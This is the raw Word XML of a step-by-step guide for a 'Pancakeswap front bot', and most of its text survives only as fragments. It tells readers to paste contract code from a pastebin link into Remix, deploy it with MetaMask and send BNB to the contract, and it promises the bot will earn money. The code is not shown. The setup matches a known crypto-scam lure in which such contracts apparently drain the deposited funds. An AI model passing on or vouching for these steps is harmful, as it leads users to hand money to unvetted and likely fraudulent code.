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The details of Pancakeswap front bot</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both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 xml:space="preserve">1、Get metamask: </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both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fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "https://metamask.io/download.html" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="4"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>https://metamask.io/download.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both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 xml:space="preserve">add BSC mainnet </w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both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fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "https://academy.binance.com/en/articles/connecting-metamask-to-binance-smart-chain" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="4"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>https://academy.binance.com/en/articles/connecting-metamask-to-binance-smart-chain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both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Open the remix online (https://remix.ethereum.org/)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Step1, click the contracts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874010"/>
            <wp:effectExtent l="0" t="0" r="3175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Step2, create new .sol file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1610" cy="2084705"/>
            <wp:effectExtent l="0" t="0" r="11430" b="31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Step3, copy the page code in this url  (https://pastebin.com/raw/bbrT22P3) to the remix.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2093595"/>
            <wp:effectExtent l="0" t="0" r="6985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Step4, click compile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180590"/>
            <wp:effectExtent l="0" t="0" r="1270" b="1397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Step5, switch the compiler version to 0.6.6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556510"/>
            <wp:effectExtent l="0" t="0" r="3810" b="381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Click compile  pancake  front  bot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377440"/>
            <wp:effectExtent l="0" t="0" r="14605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Click next button,switch the environment to injected web3.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4150" cy="2698750"/>
            <wp:effectExtent l="0" t="0" r="8890" b="1397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Connect the metamask with remix.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2258060"/>
            <wp:effectExtent l="0" t="0" r="6985" b="1270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Click the deploy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179955"/>
            <wp:effectExtent l="0" t="0" r="3175" b="1460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420620"/>
            <wp:effectExtent l="0" t="0" r="6350" b="254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Copy the contract address,and send BNB to this contract address.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04135"/>
            <wp:effectExtent l="0" t="0" r="6350" b="190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515235"/>
            <wp:effectExtent l="0" t="0" r="14605" b="1460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497580" cy="5448300"/>
            <wp:effectExtent l="0" t="0" r="7620" b="762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964" w:firstLineChars="300"/>
        <w:jc w:val="both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Than you can click the action button, the bot will be running to earn the bnb for you. If the bot successfully buy the new token,it will sell in a minute. Just look this video first()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A5E0AF"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="CFA5E0AF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E25862"/>
    <w:rsid w:val="07244B90"/>
    <w:rsid w:val="0B440E2C"/>
    <w:rsid w:val="12FC4C4C"/>
    <w:rsid w:val="19D41814"/>
    <w:rsid w:val="1A3907DB"/>
    <w:rsid w:val="1DCD06D6"/>
    <w:rsid w:val="1E191C9D"/>
    <w:rsid w:val="20D86B36"/>
    <w:rsid w:val="21C022B7"/>
    <w:rsid w:val="31067335"/>
    <w:rsid w:val="387376D6"/>
    <w:rsid w:val="3DAC0FF8"/>
    <w:rsid w:val="405C1D53"/>
    <w:rsid w:val="452B5F87"/>
    <w:rsid w:val="471E47A4"/>
    <w:rsid w:val="47CC4172"/>
    <w:rsid w:val="4C297A09"/>
    <w:rsid w:val="4C9D35E4"/>
    <w:rsid w:val="54C4424E"/>
    <w:rsid w:val="653F001D"/>
    <w:rsid w:val="67ED11DA"/>
    <w:rsid w:val="69C11892"/>
    <w:rsid w:val="7019691C"/>
    <w:rsid w:val="7E6F6B5D"/>
    <w:rsid w:val="7F180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39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2021-12-09T14:13:00Z</dcterms:created>
  <dc:creator>zx</dc:creator>
  <cp:lastModifiedBy>几月天</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-12-10T14:19:28Z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C0DE56AC7E514A4C976ED56C4EB2E805</vt:lpwstr>
  </property>
</Properties>
</file>